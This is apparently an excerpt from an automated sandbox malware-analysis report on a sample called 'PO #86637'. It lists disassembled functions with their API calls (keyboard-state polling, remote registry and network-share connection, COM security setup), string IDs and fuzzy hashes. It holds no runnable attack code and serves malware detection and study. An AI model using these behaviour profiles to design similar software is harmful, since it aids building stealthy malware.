                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                      • String ID:
                      • API String ID: 3218148540-0
                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                      Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                      • String ID:
                      • API String ID: 136442275-0
                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                      Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                      Download Yara Rule
                      APIs
                      • _wcsncpy.LIBCMT ref: 00467490
                      • _wcsncpy.LIBCMT ref: 004674BC
                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                      • _wcstok.LIBCMT ref: 004674FF
                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                      • _wcstok.LIBCMT ref: 004675B2
                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                      • _wcslen.LIBCMT ref: 00467793
                      • _wcscpy.LIBCMT ref: 00467641
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • _wcslen.LIBCMT ref: 004677BD
                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                      • String ID: X
                      • API String ID: 3104067586-3081909835
                      • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                      • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                      Function 0046CB5F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 304comCOMMON
                      Download Yara Rule
                      APIs
                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                      • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                      • _wcslen.LIBCMT ref: 0046CDB0
                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                      Strings
                      • NULL Pointer assignment, xrefs: 0046CEA6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                      • String ID: NULL Pointer assignment
                      • API String ID: 440038798-2785691316
                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                      Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                      Download Yara Rule
                      APIs
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                      • _wcslen.LIBCMT ref: 004610A3
                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                      • GetWindowRect.USER32(?,?), ref: 00461248
                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                      • String ID: ThumbnailClass
                      • API String ID: 4136854206-1241985126
                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                      Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                      Download Yara Rule
                      APIs
                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                      • GetClientRect.USER32(?,?), ref: 00471A1A
                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                      • DestroyIcon.USER32(?), ref: 00471AF4
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                      • String ID: 2
                      • API String ID: 1331449709-450215437
                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                      Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                      • __swprintf.LIBCMT ref: 00460915
                      • __swprintf.LIBCMT ref: 0046092D
                      • _wprintf.LIBCMT ref: 004609E1
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                      • API String ID: 3054410614-2561132961
                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                      Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                      • API String ID: 600699880-22481851
                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                      Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: DestroyWindow
                      • String ID: static
                      • API String ID: 3375834691-2160076837
                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                      Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                      Download Yara Rule
                      APIs
                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ErrorMode$DriveType
                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                      • API String ID: 2907320926-3566645568
                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                      Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                      • DeleteObject.GDI32(C9704A85), ref: 00470A04
                      • DestroyIcon.USER32(080071CB), ref: 00470A1C
                      • DeleteObject.GDI32(02EE1C30), ref: 00470A34
                      • DestroyWindow.USER32(02EE6CF8), ref: 00470A4C
                      • DestroyIcon.USER32(?), ref: 00470A73
                      • DestroyIcon.USER32(?), ref: 00470A81
                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                      • String ID:
                      • API String ID: 1237572874-0
                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                      Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                      Download Yara Rule
                      APIs
                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                      • VariantInit.OLEAUT32(?), ref: 004793E1
                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
                      • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                      • VariantClear.OLEAUT32(?), ref: 00479489
                      • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                      • VariantClear.OLEAUT32(?), ref: 004794CA
                      • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                      • String ID:
                      • API String ID: 2706829360-0
                      • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                      • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                      • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                      • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                      Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                      Download Yara Rule
                      APIs
                      • GetKeyboardState.USER32(?), ref: 0044480E
                      • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                      • GetKeyState.USER32(000000A0), ref: 004448AA
                      • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                      • GetKeyState.USER32(000000A1), ref: 004448D9
                      • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                      • GetKeyState.USER32(00000011), ref: 00444903
                      • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                      • GetKeyState.USER32(00000012), ref: 0044492D
                      • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                      • GetKeyState.USER32(0000005B), ref: 00444958
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698622243.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698634683.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698672821.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_PO #86637.jbxd
                      Similarity
                      • API ID: State$Async$Keyboard
                      • String ID:
                      • API String ID: 541375521-0
                      • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                      • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                      • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                      • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                      Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                      Download Yara Rule
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1698539034.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1698524277.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698587475.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.1698601356.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
